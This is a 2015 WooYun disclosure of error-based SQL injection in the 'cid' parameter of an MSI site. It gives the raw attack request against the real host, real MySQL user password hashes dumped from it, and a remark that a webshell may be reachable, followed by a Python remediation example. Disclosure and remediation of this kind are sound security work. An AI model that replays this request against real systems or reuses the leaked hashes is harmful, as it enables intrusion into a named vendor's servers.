
Vulnerability Summary

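Bug ID: wooyun-2015-0120196

Title: Error-based MySQL injection (root) on another MSI site

Vendor: MSI

Author: lijiejie

Submitted: 2015-06-13 12:28

Fixed: 2015-07-28 12:30

Disclosed: 2015-07-28 12:30

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 8

Status: Vendor could not be reached or actively ignored the report

Source: http://www.wooyun.org. For questions or help, contact [email protected]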



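Vulnerability Details

Disclosure status:

2015-06-13: Actively contacting the vendor and waiting for the vendor to claim the report; details not public
2015-07-28: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Error-based MySQL injection on another MSI site

Details: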

POST /product/pages/list_ajax HTTP/1.1
Content-Length: 360
Content-Type: application/x-www-form-urlencoded
Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%223b4a613c9db6ea54f743f14ae1c9a457%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22220.181.109.191%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A108%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F28.0.1500.63+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1434115554%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7D07644a2639b0160780b4ae0d67419fcc
Host: server.msi.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

c=server&cid=*&d=list&p=product&sk=Server+Board&sw=ajax&title=Server+Board


The cid parameter is injectable.

Proof of concept:

current database:    'msi_www_db'
available databases [60]:


Dumped the mysql.user table; the passwords of both users could not be cracked:

root        | <blank> | *92C1D9C9BCCE50690A8447295415750781153EED
172.16.16.% | msi_ap_user | <blank> | *F7C59E45D6D9357ABD9735D5F057B8F041CC3098


There is some chance of obtaining a webshell.

Fix:

Filter the parameter.

Copyright notice: when reposting, please credit the source lijiejie@WooYun
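
One way to apply this fix on the server side, as an added example that is not part of the original report or the vendor's code: the handler validates `cid` strictly, binds it as a query parameter, and never returns database error text (error-based injection depends on that text reaching the client). Assumptions: `cid` is a numeric category id, the `product` table and its columns are hypothetical, and Python's `sqlite3` stands in for MySQL so the block runs offline.

```python
import sqlite3
from urllib.parse import parse_qs


def make_db():
    """Constructed stand-in data; the real schema is not shown in the report."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE product (id INTEGER PRIMARY KEY, cid INTEGER, title TEXT)")
    db.executemany(
        "INSERT INTO product (cid, title) VALUES (?, ?)",
        [(7, "Server Board A"), (7, "Server Board B"), (9, "Barebone C")],
    )
    return db


def parse_cid(body):
    """Return cid as an int, or None unless it is exactly one value of 1-9 ASCII digits."""
    values = parse_qs(body, keep_blank_values=True).get("cid", [])
    if len(values) != 1:
        return None  # missing or duplicated parameter
    raw = values[0]
    if not (raw.isascii() and raw.isdigit() and len(raw) <= 9):
        return None  # rejects '*', quotes, operators, Unicode digits, empty value
    return int(raw)


def list_ajax(db, body):
    """Handle the form-encoded POST body; return (status, payload)."""
    cid = parse_cid(body)
    if cid is None:
        return 400, "invalid request"
    try:
        # The value is bound by the driver and never concatenated into the SQL text.
        rows = db.execute(
            "SELECT title FROM product WHERE cid = ? ORDER BY id", (cid,)
        ).fetchall()
    except sqlite3.Error:
        # Generic message only: driver errors must not be echoed to the client.
        return 500, "internal error"
    return 200, [row[0] for row in rows]
```

Validation and parameter binding are independent layers; binding alone already keeps the value out of the SQL text, and the generic 500 response removes the error channel.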


Vulnerability Response

Vendor response:

Vendor could not be reached or actively refused

Vulnerability Rank: 8 (WooYun rating)